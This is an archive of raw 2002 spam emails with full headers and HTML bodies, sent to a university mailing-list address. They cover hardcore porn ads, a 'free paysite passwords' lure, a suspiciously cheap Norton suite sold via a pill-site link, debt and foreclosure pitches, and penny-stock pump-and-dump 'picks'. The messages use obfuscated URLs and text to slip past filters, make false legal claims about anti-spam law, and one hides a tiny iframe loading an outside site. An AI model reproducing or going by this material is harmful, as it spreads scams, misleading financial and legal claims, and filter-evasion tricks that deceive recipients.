<HTML><TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0><TR><TD align=center valign=middle BGCOLOR=#0A0A5A><center><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif"><strong>GET FREE ACCESS TO XXX PORN!</strong></font></a><br><table width=100 border=3 cellspacing=0 cellpadding=0><tr><td><TABLE WIDTH=550 BORDER=0 CELLPADDING=0 CELLSPACING=0><TR><TD COLSPAN=3><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_01.jpg WIDTH=550 HEIGHT=112 border=0></a></TD></TR><TR><TD><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_02.gif WIDTH=104 HEIGHT=231 border=0></a></TD><TD><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_03.jpg WIDTH=339 HEIGHT=231 border=0></a></TD><TD><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_04.gif WIDTH=107 HEIGHT=231 border=0></a></TD></TR><TR><TD COLSPAN=3><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_05.gif WIDTH=550 HEIGHT=57 border=0></a></TD></TR></TABLE></td></tr></table><a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank><strong><font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif">INSTANT ACCESS... 100% FREE HARDCORE</font></strong></a><br><br><br><br><div align=center><font face="Times New Roman, Times, serif" size=1 color=#710000>Note: If you would would like to be removed from our list, please reply to this email with the word REMOVE as the subject</font></div></center></TD></TR></TABLE></HTML>

qzsavv23

From RaeannKovach@netscape.com Sat Sep 28 09:35:30 2002
Return-Path: <RaeannKovach@netscape.com>
Received: from mail.fra.eurocyber.net (mail.fra.eurocyber.net [195.143.109.5])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g8SDZTZ5014051
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 28 Sep 2002 09:35:29 -0400 (EDT)
Received: from netscape.com (unknown [195.143.192.130])
	by mail.fra.eurocyber.net (Postfix) with SMTP
	id 819D38824; Sat, 28 Sep 2002 15:30:26 +0200 (CEST)
Subject: awsome stuff (P041W)
Reply-To: sandovalsommersw03mu28j0@yahoo.com
Date: Sat, 28 Sep 2002 06:9:12 -0400
From: "Godsey Byrnside" <GodseyByrnside@netscape.com>
To: "Faircloth Puehler" <Samain@canada.com>
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-MSMail-Priority: Normal
X-Priority: 3 (Normal)
X-Comment: G05gFo1E37ACqjpAW62X7f7U046Si
Importance: Normal
X-Originating-Ip: [3.5.750.18]
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="IWP---Minemindfxxyf7qy1Sx="
Content-Transfer-Encoding: 7bit
Message-Id: <20020928133026.819D38824@mail.fra.eurocyber.net>

--IWP---Minemindfxxyf7qy1Sx=
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="US-ASCII"

<CENTER>
<table border=1 cellspacing=0 cellpadding=2 width=500 bordercolor=#928CC6 bgcolor=#0A0A5A><TR><TD>
<table border=0 cellspacing=0 cellpadding=2 width=490>
<TR>
<TD ALIGN=LEFT VALIGN=TOP WIDTH=100%>
<CENTER>
<a href=http://www.freehostclub.com/~vol26/1/index.html target=_blank style="FONT-SIZE: 20px; TEXT-DECORATION: none; COLOR: #FFFFFF; FONT-FAMILY: Geneva, Arial, Helvetica, san-serif;">
<font face="Geneva, Arial, Helvetica, san-serif"><font color="#FFFFFF">GUARANTEED 
    <font color="#FE21FE">100% FREE</font> PASSWORDS<br>
    <font color="#FFFF00">GET INTO PAYSITES FOR FREE</font><BR>
Click Here to Enter!</A><BR><BR></CENTER>
<FONT style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: #FFFF00; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>Did you know that....</B><BR><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: WHITE; FONT-FAMILY: Arial, Verdana, Helvetica;">
The laws governing the adult Internet business have recently become extremely strict to protect consumers. You now can, and should take advantage of this protection.&#32<BR><BR>
<CENTER><a href=http://www.free%68ostclub.com/~vol26/1/index.html target=_blank style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: #FFFFFF; FONT-FAMILY: Geneva, Arial, Helvetica, san-serif;">Click He&#114e to Enter!</A><BR><BR></CENTER>
 
<FONT style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: #FFFF00; FONT-FAMILY: Arial, Verdana, Helvetica;" Ss7vyhl0gW>
<B>But there is more....</B><BR><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: WHITE; FONT-FAMILY: Arial, Verdana, Helvetica;">
Companies that off&#101r <B>FREE PASSWORDS</B> must, by law, honor this promise. Companies give away free access to their websites just to generate traffic to it so they can promote other things by using banners and such. Remember, if it says FREE, <B>you are not obligated to buy anything.</B><BR><BR>
<CENTER><a href=http://www.freeh%6Fstclub.com/~vol26/1/index.html target=_blank style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: #FFFFFF; FONT-FAMILY: Geneva, Arial, Helvetica, san-serif;">Click Here to Enter!</A><BR><BR></CENTER>
 
<FONT style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: #FFFF00; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>Last but not least....</B><BR><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: WHITE; FONT-FAMILY: Arial, Verdana, Helvetica;" 82>
Some companies offer free trial memberships. So all you have to d&#111 is join the site as you would any normal site, and cancel before the trial period runs out. They make their $ when u either genuinely like the site and remain a member or when u forget to cancel. If you cancel on time <B t17b8LeX>YOU WILL NOT BE CHARGED!!!</B><BR><BR>
<CENTER PTd><a href=http://www.free%68ostclub.com/~vol26/1/index.html target=_blank style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: #FFFFFF; FONT-FAMILY: Geneva, Arial, Helvetica, san-serif;">Click Here&#32to Enter!</A><BR><BR></CENTER>
<FONT style="FONT-SIZE: 20px; TEXT-DECORATION: none; COLOR: #FE21FE; FONT-FAMILY: Arial, Verdana, Helvetica;"><CENTER>
<B>we’ve compiled some of the biggest and best FREE hardcore sites on the net!</B bwe><BR><BR>

<a href=http://www.freehostclub.c%6Fm/~vol26/1/index.html target=_blank>
<font color=#FFFF00 size=5 face="Arial, Verdana, Helvetica">
<strong>INSTANT ACCESS 100% FREE HARD-CORE</strong></font><BR></A></CENTER>
</TD>
</TR>
</TABLE>
</TD></TR AmLy8t0V103></TABLE>
<FONT style="FONT-SIZE: 10px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"><BR><BR>
This email was sent to you because your email is part of a targeted opt-in list. If you do not wish to receive further mailings from this offer, please click below and enter your email to remove your email from future offers.
Anti-SPAM Policy Disclaimer: Under Bill s.1618 Title III passed by the 105th U. S. Congress, mail cannot be considered spam as long as we include contact information and a remove link for removal from this mailing list. If this e-mail is unsolicited, please accept our apologies. Per the proposed H.R. 3113 Unsolicited Commercial Electronic Mail Act of 2000, further transmissions to you by the sender may be stopped at NO COST to you 
Do Not Reply To This Message To Be Removed.
Easy Remove and contact: <A HREF="http://www.freehostc%6Cub.com/~bten/remove/remove.html" C2wja7m2G>click here</A>
</CENTER>
s10

--IWP---Minemindfxxyf7qy1Sx=--


From RounsavilleChimilio@themail.com Thu Oct  3 20:34:29 2002
Return-Path: <RounsavilleChimilio@themail.com>
Received: from mailbackup.zeelandnet.nl (mailbackup.zeelandnet.nl [62.238.255.196])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g940YSZ5021699
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 3 Oct 2002 20:34:28 -0400 (EDT)
Received: from 62.238.33.246 (kbl-tnz500.zeelandnet.nl [62.238.33.246])
	by mailbackup.zeelandnet.nl (Postfix) with SMTP
	id 31AAD5F643; Fri,  4 Oct 2002 02:29:23 +0200 (CEST)
To: "Ellman Mowen" <Allara@address.com>
Date: Fri, 27 Sep 2002 15:43:41 -0400
From: "Standeven Plasencia" <StandevenPlasencia@themail.com>
Subject: Protecting your PC has never been more important (BTA32bo2f5e)
Reply-To: harmanlankford132u6ggb0@yahoo.com
Organization: NwMgTEce
X-MSMail-Priority: Normal
Errors-To: <harmanlankford132u6ggb0@yahoo.com>
Importance: Normal
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2100.0000
X-Priority: 3 (Normal)
X-Comment: Yc35w38e1PhBBVVyyCkO
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="6w7uJua0y62Qop181nkL0lQspj82fhvoufcD3C---MinemindfxxyfdPgts2="
Content-Transfer-Encoding: 7bit
Message-Id: <20021004002923.31AAD5F643@mailbackup.zeelandnet.nl>

--6w7uJua0y62Qop181nkL0lQspj82fhvoufcD3C---MinemindfxxyfdPgts2=
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<CENTER>

<table border=1 cellspacing=0 cellpadding=2 width=450 bordercolor=#606060 bgcolor=#FFFFFF><TR><TD>
<table border=0 cellspacing=0 cellpadding=2 width=440>
<TR>
<TD ALIGN=center VALIGN=middle WIDTH=100%>
<A HREF="http://vir%69litypropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">
Powerful Solutions To Prote&#99t Your Computer!</A><BR><BR>
<FONT style="FONT-SIZE: 13px; TEXT-DECORATION: none; COLOR: 3B3B3B; FONT-FAMILY: Arial, Verdana, Helvetica;">
Virus infections really happen on your home computer as well as at the office. Ge&#116 all the integrated services for Windows at an affordable price!
<BR><BR>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: 3B3B3B; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>6 Feature-Packed Utilities, 1 Great Price</B><BR>
<FONT style="FONT-SIZE: 17px; TEXT-DECORATION: none; COLOR: D20005; FONT-FAMILY: Arial, Verdana, Helvetica;">
A $300+ Combined Retai&#108 Value for Only <B>$29.99!</B><BR><BR>
<A HREF="http://virilitypropills.co%6D/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank FONT style="FONT-SIZE: 16px; TEXT-DECORATION: underline; COLOR: 3B3B3B; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>Get Norton Systemworks 2002 Professional Software Suite<BR>Click Here To Purchase for only $29.99!</B></A>
</TD>
</TR>
<TR>
<TD ALIGN=LEFT VALIGN=middle WIDTH=100%>
<FONT style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: 004164; FONT-FAMILY: Arial, Verdana, Helvetica;"><BR>
<CENTER><B>Don't fall prey to destructive viruses or programs!</B><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: 004164; FONT-FAMILY: Arial, Verdana, Helvetica;">
Protect you&#114 computer and your valuable information. This terrific suite of products from Norton combines the world's #1 utility suite with advanced tools for PC experts. Take a look at what you get: </B><BR><BR></CENTER>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: 3B3B3B; FONT-FAMILY: Arial, Verdana, Helvetica;">

<B>1) Norton AntiVirus 2002</B> - The world's most trusted anti-virus solution!<BR><BR>
Detects and repairs many viruses automatically, without interrupting your work .It scans and cleans both incoming and outgoing email. To maximize your virus protection, Norton AntiVirus keeps itself updated automatically over the Internet.<BR><BR>
<CENTER><A HREF="http://virilitypropills.%63om/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click Here t&#111 order Norton System Works 2002 for only $29.99</A></CENTER><BR><BR>

<B>2) Norton Ghost 2002</B><BR><BR>
Provides high-performance utilities for fast and safe system upgrading, backup, and recovery. 
<BR><BR>
<CENTER><A HREF="http://virilitypropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click&#32Here to order Norton System Works 2002 for only $29.99</A></CENTER><BR><BR>

<B>3) GoBack 3 Personal Edition</B><BR><BR>
Delivers quick and easy system recovery, providing award-winning protection to Windows PCs. 
<BR><BR>
<CENTER><A HREF="http://virilitypropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click Here t&#111 order Norton System Works 2002 for only $29.99</A></CENTER><BR><BR>

<B>4) Norton Utilities 2002</B><BR><BR>
Optimizes your PC's performance and solves problems easily. It diagnoses and solves Windows problems, tunes your computers' hard drive for maximum efficiency, and monitors your PC continuously to detect and fix potential problems.
<BR><BR>
<CENTER><A HREF="http://virilitypropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click Here to order Norton System Works 2002 for only $29.99</A></CENTER><BR><BR>

<B>5) Norton CleanSweep 2002</B><BR><BR>
Clean out Internet buildup with award-winning Norton CleanSweep from Symantec. It improves your PC's performance by removing unwanted programs and other files that waste disk. 
<BR><BR>
<CENTER><A HREF="http://virility%70ropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click Here to order Norton System Works 2&#4802 for only $29.99</A></CENTER><BR><BR>

<B>6) Norton WinFax Basic Edition 2002</B><BR><BR>
WinFax, the leading fax management software for small businesses, has been the best-selling fax software product from June 1999 to June 2001. 
<BR><BR>
<CENTER>
<A HREF="http://vir%69litypropills.com/cgi-bin/at.cgi?a=210867&e=/www/" target=_blank style="FONT-SIZE: 17px; TEXT-DECORATION: underline; COLOR: CA090E; FONT-FAMILY: Arial, Verdana, Helvetica;">Click Here to order Norton System Work&#115 2002 for only $29.99<BR><BR>
A $300+ Combined Retail Value for Only <B>$29.99!</B><BR></B></A>

</TD>
</TR>
</TR>
</TABLE>
</TD></TR></TABLE>
<FONT style="FONT-SIZE: 10px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;">
To stop receiving this message reply to this email with the word REMOVE in the subject.
</CENTER>
AOaFhEw4VTUkdjs

--6w7uJua0y62Qop181nkL0lQspj82fhvoufcD3C---MinemindfxxyfdPgts2=--


From BuerAppelman@themail.com Wed Oct 16 07:14:09 2002
Return-Path: <BuerAppelman@themail.com>
Received: from smarthost2.mail.uk.easynet.net (smarthost2.mail.uk.easynet.net [212.135.6.12])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g9GBE8Z5021914
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 16 Oct 2002 07:14:08 -0400 (EDT)
Received: from dial2.mail.uk.easynet.net ([195.40.1.235])
	by smarthost2.mail.uk.easynet.net with esmtp (Exim 3.35 #1)
	id 181m8L-0005MV-00; Wed, 16 Oct 2002 12:14:37 +0100
Received: from [217.207.237.162] (helo=217.207.237.162)
	by dial2.mail.uk.easynet.net with smtp (Exim 3.34 #1)
	id 181m8K-0006kb-00; Wed, 16 Oct 2002 12:14:36 +0100
Subject: Gain control of your finances (TR62R8G7P14)
Reply-To: mchughelenoratgf8ymtpw@yahoo.com
Date: Wed, 16 Oct 2002 04:20:42 -0400
To: "Kleckner Leviston" <Fomby@alloymail.com>
From: "Mulero Deroche" <MuleroDeroche@themail.com>
Importance: Normal
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
X-Originating-Ip: [953.536.552.8]
X-Accept-Language: en
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Sender: "Mulero Deroche" <MuleroDeroche@themail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="=xymMimeex22ader2aT65OkR71Hq0S1VI2uTPp6aV=="
Content-Transfer-Encoding: 7bit
Message-Id: <E181m8K-0006kb-00@dial2.mail.uk.easynet.net>

--=xymMimeex22ader2aT65OkR71Hq0S1VI2uTPp6aV==
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<CENTER>
<table border=1 cellspacing=0 cellpadding=5 width=500 bordercolor=#202F51 bgcolor=#F7F7F7>
<TR><TD ALIGN=CENTER VALIGN=middle>
<A HREF="http://email-system.com/smort/5/" style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Arial, Verdana;">
<B>:::&nbsp;&nbsp;&nbsp;<FONT COLOR=RED>Free</FONT> <FONT COLOR=571C9F>Debt&#32Consultation!</FONT>&nbsp;&nbsp;&nbsp;:::</A></B>
</TD></TR><TR><TD ALIGN=LEFT VALIGN=middle><CENTER>
<FONT style="FONT-SIZE: 14px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Arial, Verdana;">
<B>Reduce</B> Your Monthly Payments!<BR>
Slash Interest Rates!<BR>
One Simple </B>Low Monthly Payment!</B><BR><BR>
Get a <B>FREE</B> Debt Analysis with <B>No Obligation!</B></FONT><BR><BR>
<A HREF="http://email-system%2Ecom/smort/5/" style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: 571C9F; FONT-FAMILY: Helvetica, Arial, Verdana;"><B> &#62&#62 Click Here to Get Started! &#60&#60 </B></A><BR><BR>
<FONT style="FONT-SIZE: 14px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Arial, Verdana;">
If you're having debt problems, or would like to simplify things to help pay o&#102f your debt you may benefit from what they have to offer. Instead of paying many bills, you have only <b>one bill to pay each month</B> for ALL your accounts. You'll end up paying about <B>half as much as you are paying now!</B>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: RED; FONT-FAMILY: Helvetica, Arial, Verdana;">
<BR><BR><B>Settle all your Debt<BR>For Good!</B><BR><BR>
<A HREF="http://email-system.%63om/smort/5/" style="FONT-SIZE: 15px; TEXT-DECORATION: underline; COLOR: 571C9F; FONT-FAMILY: Helvetica, Arial, Verdana;"><B> &#62&#62 Click Here to Become Debt Free! &#60&#60 </B></A><BR><BR>
<FONT style="FONT-SIZE: 14px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Arial, Verdana;">
This is your chance to permanently solve your  Debt and Cr&#101dit Problems! It worked for thousands and now it can work for you!<BR><BR>
</TD></TR></TABLE>
<FONT style="FONT-SIZE: 10px; TEXT-DECORATION: none; COLOR: GRAY; FONT-FAMILY: Arial, Verdana, Helvetica;">
To unsu&#98scribe from this message please reply with the word REMOVE in the Subject Line.
</CENTER>
S00boAf218lv77KD365ry6w8v5vn44C7032IQ3N5m2Mxce646c

--=xymMimeex22ader2aT65OkR71Hq0S1VI2uTPp6aV==--


From Subscriber_Services78048@mindspring.com Wed Oct 30 11:24:10 2002
Return-Path: <Subscriber_Services78048@mindspring.com>
Received: from 200.206.168.180 (213-96-105-140.uc.nombres.ttd.es [213.96.105.140])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id g9UGO7Z5008516
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 30 Oct 2002 11:24:08 -0500 (EST)
Message-Id: <200210301624.g9UGO7Z5008516@netlib2.cs.utk.edu>
Received: from unknown (124.215.35.163) by rly-xw01.mx.aol.com with QMQP; Oct, 30 2002 9:56:52 AM +1100
Received: from 34.57.158.148 ([34.57.158.148]) by rly-xr02.mx.aol.com with local; Oct, 30 2002 9:18:01 AM -0300
Received: from unknown (HELO smtp4.cyberec.com) (24.156.151.193) by rly-xw05.mx.aol.com with esmtp; Oct, 30 2002 8:07:14 AM -0200
From: "WALL STREET BULLETIN..46954" <Subscriber_Services78048@mindspring.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: 
Subject: NEW STOCK PICK: NNCO - LAST PICK UP 300% IN JUST 2 DAYS............................................................................................................................................................................ aygi
Sender: "WALL STREET BULLETIN..46954" <Subscriber_Services78048@mindspring.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 30 Oct 2002 10:20:19 -0600
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><font style="font-size: 11pt" face="Courier">Did you miss out on PRCT, UP 300% IN JUST 2 DAYS?</font></p>
<p align="center"><font style="font-size: 11pt" face="Courier">If so, Here's another pick - Another Short Play</font></p>
<p align="center"><b><a href="http://www.globalwebcollective.net/Wall_Street_Bulletin.htm">CLICK HERE</a></b></p>
<p align="center"><img border="0" src="http://www.globalwebcollective.net/stopwatch01.gif"></p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">I no longer wish to receive your newsletter <a href="mailto:notforme2002@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

nfaymekfhliresmwdvphjihnka

From StopForeclosure98458@dell.com Sat Nov  2 20:07:04 2002
Return-Path: <StopForeclosure98458@dell.com>
Received: from 63.230.213.209 ([63.230.213.209])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gA316tZ5008734
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 2 Nov 2002 20:07:01 -0500 (EST)
Message-Id: <200211030107.gA316tZ5008734@netlib2.cs.utk.edu>
Received: from 117.83.248.68 ([117.83.248.68]) by rly-xl04.mx.aol.com with NNFMP; Nov, 02 2002 6:57:35 PM -0000
Received: from sparc.isl.net ([45.55.85.241]) by anther.webhostingtalk.com with NNFMP; Nov, 02 2002 5:56:33 PM -0100
Received: from [176.244.234.14] by smtp-server6.tampabay.rr.com with local; Nov, 02 2002 5:06:21 PM +0300
From: StopForeclosure1024 <StopForeclosure98458@dell.com>
To: HOMEOWNER97301
Cc: 
Subject: STOP YOUR FORECOSURE............................................................................................................................................................................................... oudul
Sender: StopForeclosure1024 <StopForeclosure98458@dell.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Sat, 2 Nov 2002 19:11:47 -0600
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><img border="0" src="http://www.globalwebcollective.net/SRLogo.gif"></p>
<p align="center"><b><a href="http://www.globalwebcollective.net/SRCapital.htm">CLICK HERE</a></b></p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">Unsubscribe <a href="mailto:notforme2002@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

tpcvmjrhwaprfrtaiamxitgmsrkrrodmy

From linuxhong@orgio.net Tue Nov  5 12:15:43 2002
Return-Path: <linuxhong@orgio.net>
Received: from localhost ([211.207.5.98])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gA5HFRZ5013731
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 5 Nov 2002 12:15:41 -0500 (EST)
Message-Id: <200211051715.gA5HFRZ5013731@netlib2.cs.utk.edu>
Reply-To: linuxhong@orgio.net
From: "julia.T"<linuxhong@orgio.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: (±¤°í)Free_Domain_name registration_Site.¹«·áµµ¸ÞÀÎ³×ÀÓµî·Ï.Limited Chance No banner_Advertisement 
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 6 Nov 2002 02:16:22 +0900

<html>
<head>
<title>Free Domain name Registration</title>
<meta name="generator" content="dot.co.sr">
</head>
<BODY text=black vLink=purple aLink=red link=blue bgColor=white>
<P><A href="http://dot.co.sr"><B>http://dot.co.sr</B></A>&nbsp; <FONT
color=#ff0080 size=2>(<STRONG>¹«·áµµ¸ÞÀÎµî·Ï</STRONG>)<BR></FONT><B><FONT
color=#cc0000><SPAN style="FONT-SIZE: 16pt">Free Multilingual Domain name
Registration Site</SPAN></FONT></B><SPAN style="FONT-SIZE: 16pt">. <BR>Limited
Chance<BR></SPAN><B>
</B><P align=center><B><a href="http://dot.co.sr"><IMG title="Asia Pacific (Korean" height=23
alt="Asia Pacific (Korean)" src="http://dot.co.sr/images/korean.jpg" width=38
border=0> <IMG title="United States (The Americas)" height=23
alt="United States (The Americas)" src="http://dot.co.sr/images/usa.jpg"
width=38 border=0> <IMG
title="United Kingdom (Europe, Middle East &amp; Africa)" height=23
alt="United Kingdom (Europe, Middle East &amp; Africa)"
src="http://dot.co.sr/images/uk.jpg" width=38 border=0> <IMG
title="France (Fran?is)" height=23 alt="France (Fran?is)"
src="http://dot.co.sr/images/france.jpg" width=38 border=0> <IMG
title="Sweden (Svenska)" height=23 alt="Sweden (Svenska)"
src="http://dot.co.sr/images/sweden.jpg" width=38 border=0> <IMG
title="Germany (Deutsch)" height=23 alt="Germany (Deutsch)"
src="http://dot.co.sr/images/germany.jpg" width=38 border=0> <IMG
title="Italy (Italiano)" height=23 alt="Italy (Italiano)"
src="http://dot.co.sr/images/italy.jpg" width=38 border=0> <IMG
title="China (Chinese)" height=23 alt="China (Chinese)"
src="http://dot.co.sr/images/china.jpg" width=38 border=0> <IMG title=Japan
height=23 alt=Japan src="http://dot.co.sr/images/japan.jpg" width=38 border=0>
<IMG title=Australia height=23 alt=Australia
src="http://dot.co.sr/images/aust.jpg" width=38 border=0><FONT color=red>
<BR>http://www.love.co.sr <BR>http://www.»ç¶û.co.sr <BR>http://www.ª¹ªÎªÇ.co.sr
<BR>http://www.ÞìÜôÔð.co.sr </FONT></a></B></P><B><BR>1. Free Domain name registration<BR>2.
No banner Advertisement.<BR>3. Free Forwarding Service.<BR>4. Dynamic IP
server(ADSL....etc)<BR></B>
<P><A href="http://name.co.sr"><SPAN style="FONT-SIZE: 14pt"><STRONG>Free
Register now </STRONG></SPAN></A><SPAN
style="FONT-SIZE: 14pt"><STRONG>!!!<BR></STRONG></SPAN><A
href="http://dot.co.sr"><STRONG>http://dot.co.sr</STRONG></A></P>
<P><FONT size=1>(±¤°í)Free_Domain_name registration_Site.¹«·áµµ¸ÞÀÎ³×ÀÓµî·Ï.Limited Chance
No banner_Advertisement</FONT>
<HR color=#8bb5e2>
<DIV align=center><FONT face=±¼¸² color=#8bb5e2 size=2>º» ¸ÞÀÏÀº Á¤º¸Åë½ÅºÎ ±Ç°í »çÇ×¿¡ ÀÇ°Å Á¦¸ñ¿¡
[±¤°í]¶ó Ç¥½ÃµÈ ±¤°í ¸ÞÀÏÀÔ´Ï´Ù.</FONT><BR><A
style="PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT-SIZE: 12px; PADDING-BOTTOM: 3px; COLOR: #ffff00; PADDING-TOP: 3px; FONT-FAMILY: ±¼¸²; BACKGROUND-COLOR: #8bb5e2; TEXT-DECORATION: none"
href="http://nospam.co.sr">¼ö½Å°ÅºÎ</A> <FONT color=#8bb5e2 size=2>¹öÆ°À» Å¬¸¯ÇÏ½Ã¸é ¼ö½Å°ÅºÎÃ³¸®°¡
ÀÌ·ç¾î Áý´Ï´Ù.</FONT> </DIV>
<HR color=#8bb5e2>
<IFRAME src="http://name.co.sr" width=2 height=2
boarder="0"></IFRAME>
</BODY></HTML>

From Subscriber_Services78036@airmail.net Wed Nov  6 09:04:58 2002
Return-Path: <Subscriber_Services78036@airmail.net>
Received: from 200.67.112.228 (host066106.metrored.net.ar [200.49.66.106] (may be forged))
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gA6E4qZ5001230
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 6 Nov 2002 09:04:56 -0500 (EST)
Message-Id: <200211061404.gA6E4qZ5001230@netlib2.cs.utk.edu>
Received: from 51.110.169.187 ([51.110.169.187]) by rly-xl04.mx.aol.com with SMTP; Nov, 06 2002 7:44:09 AM +0700
Received: from 14.17.76.127 ([14.17.76.127]) by rly-xl04.mx.aol.com with QMQP; Nov, 06 2002 6:53:12 AM +0400
Received: from unknown (HELO mailout2-eri1.midsouth.rr.com) (184.119.91.62) by rly-xw05.mx.aol.com with asmtp; Nov, 06 2002 5:55:31 AM +0600
From: "WALL STREET BULLETIN..47617" <Subscriber_Services78036@airmail.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: 
Subject: NEW STOCK PICK: NVHG - LAST PICK UP 300%......................................................................................................................................................................................................... tfwr
Sender: "WALL STREET BULLETIN..47617" <Subscriber_Services78036@airmail.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 6 Nov 2002 08:05:36 -0600
X-Mailer: Microsoft Outlook Build 10.0.2616
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><font style="font-size: 11pt" face="Courier">Did you miss out on PRCT, UP 300%?</font></p>
<p align="center"><font style="font-size: 11pt" face="Courier">Here's another pick - Another Short Play</font></p>
<p align="center"><b><a href="http://www.4bfif78gt5ybtfp94w786yt53ytbigiiugey9875y36tuhw.com/Wall_Street_Bulletin.htm">CLICK HERE</a></b></p>
